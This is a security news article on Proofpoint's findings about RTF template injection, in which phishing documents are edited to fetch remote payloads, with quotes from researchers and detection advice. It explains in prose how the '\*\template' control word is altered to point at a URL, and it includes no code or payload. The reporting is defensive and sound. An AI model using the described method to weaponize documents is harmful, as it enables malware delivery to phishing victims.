The Toronto Proofpoint office. Company researchers expressed concern that cybercriminal actors will increasingly adopt RTF injection as a way to weaponize emailed documents, due to the technique’s accessibility and triviality compared to similar techniques. (Raysonho @ Open Grid Scheduler / Scalable Grid Engine, CC0, via Wikimedia Commons)

Researchers expressed concern that cybercriminal actors will increasingly adopt RTF injection as a way to weaponize emailed documents, due to the technique’s accessibility and triviality compared to similar techniques.

Via RTF injection, attackers can manipulate Rich Text Format files so that these files retrieve malicious content from an external URL, instead of from a legitimate file resource destination. This is possible because within the RTF file code are document formatting properties that can be easily changed via a hex editor, without the need of a word processor application, according to a recently published blog post report from Proofpoint.

Moreover, Proofpoint found that the sample RTF template injection files it analyzed had a lower antivirus engine detection rate compared to a previously established Microsoft Office-based template injection technique.

Previous techniques largely relied on the use of embedded objects within the RTF file structure to deliver malicious payloads. That requires the compilation of a payload (or multiple stages of payloads and installers) which are then encoded and embedded within an RTF file… so the payload can be installed upon opening,” explained Sherrod DeGrippo, Proofpoint’s vice president of threat research and detection, in an interview with SC Media. But this new method “potentially removes the need for developer derived tools and places the power in the hands of operational phishing teams delivering malicious email campaigns.”

There’s a big upside for attackers executing this tactic because “many organizations do not block RTF files by default,” she added. “They are part of the ordinary fabric of a business operations environment.”

Proofpoint has identified three APT groups that in Q2 and Q3 of 2021 leveraged RTF injection for phishing campaigns, but the company’s researchers said they are “moderately confident” that we could soon see a significant uptick in activity featuring the same tactic, but perpetrated by less sophisticated, financially motivated actors.

“RTF template injection is poised for wider adoption in the threat landscape including among cybercriminals based on its ease of use and relative effectiveness when compared with other phishing attachment template injection-based techniques,” wrote blog author Michael Raggi, senior threat researcher engineer.

In fact, DeGrippo, told SC Media RTF template injection has already “been used before in a limited capacity by crimeware actors,” citing research from analyst Fareed Fauzi in January 2021 and an additional blog post from July 2021.

“We often see new or updated techniques that are discovered by groups with more resources, [get] adopted by smaller groups or individuals once it’s known how to execute the particular attack type,” said Hank Schless, senior manager, security solutions at Lookout. “With the number of documents we receive on a daily basis across email, collaboration platforms, networking apps and more, this tactic is also prime for social engineering.”

Raggi’s report described the technique as follows: “RTF files include a ‘\*\template’ control word, where the value ‘*\’ designates that the following value is a destination, and ‘template’ designates the specific control word function. This control word value is intended to be the destination of a legitimate template file which is retrieved and loaded upon the opening of the initial RTF, changing the visual appearance of the file. However, it is trivial to alter the bytes of an existing RTF file to insert a template control word destination including a URL resource. This allows the RTF file to retrieve a URL resource as a destination rather than a file like the RTF structure intends. This method is viable in both .rtf and .doc.rtf files, allowing for the successful retrieval of remote payloads hosted at an external URL.”

Depending on the format of the weaponized file, victims at certain points see some combination of a decoy document, a “contacting the server message” and/or an error message.

“Successfully executing this attack could deliver malware into the organization's infrastructure,” said Schless. “Aside from infecting the infrastructure, this could also lead to creation of a backdoor into the organization. This would enable the attacker to enter the infrastructure undetected and move laterally in search of valuable data or observe the organization’s behaviors and security protections to eventually carry out an advanced cyberattack. “

According to Proofpoint, the technique has been already used by the reputed Indian ATP group DoNot Team, a Chinese-related APT actor and suspected Russian APT actor Gamaredon.

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector,” Raggi wrote. “The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide.”

As for how can organizations best protect themselves and their employees against this particular phishing threat, detection will be key. For that, DeGrippo recommended “to scan incoming RTF files with some sort of signature type like Yara or Clam AV for the RTF template control group including a URL or Unicode bytes comprising an encoded URL.” (Proofpoint lists some signatures in its blog post.)

“RTFs like mentioned in the blog have their file properties in plaintext so detecting this type of technique in an organization’s traffic should be relatively easy if conducting file scanning at the email gateway or on the host,” DeGrippo continued. “However, it's important to keep in mind that legitimate RTF files may use the RTF template control word to redirect to legitimate template files, not URLs.”

Sean Nikkel, senior cyber threat Intel Analyst at Digital Shadows, added that users “should become aware of the risks of opening documents that require downloads of templates or other data from the internet, especially from unknown users. Organizations may want to consider restricting the use of certain file types, such as RTF, in case security tools don't catch suspicious signatures or behaviors that would be a giveaway for attacks like these. An even more restrictive security stance might involve stripping inbound emails of attachments or using a sandbox to test them for malicious activity.”

The onus falls largely on email recipients and their organizations because, unfortunately, there’s not much chance that the RTF format is revised and better secured against manipulation. 

“The fundamentals of the RTF file type, including destination control words and the 16-bit Unicode characters used by actors have been ‘baked in’ so to speak since RTF v 1.5 in April of 1997,” explained DeGrippo. “Microsoft discontinued development on RTF in 2008; however, it continues to be supported by applications in almost every operating system. So while the RTF file format could possibly be fundamentally reimagined, the likelihood of a file type not under active development being updated for security reasons is unlikely.”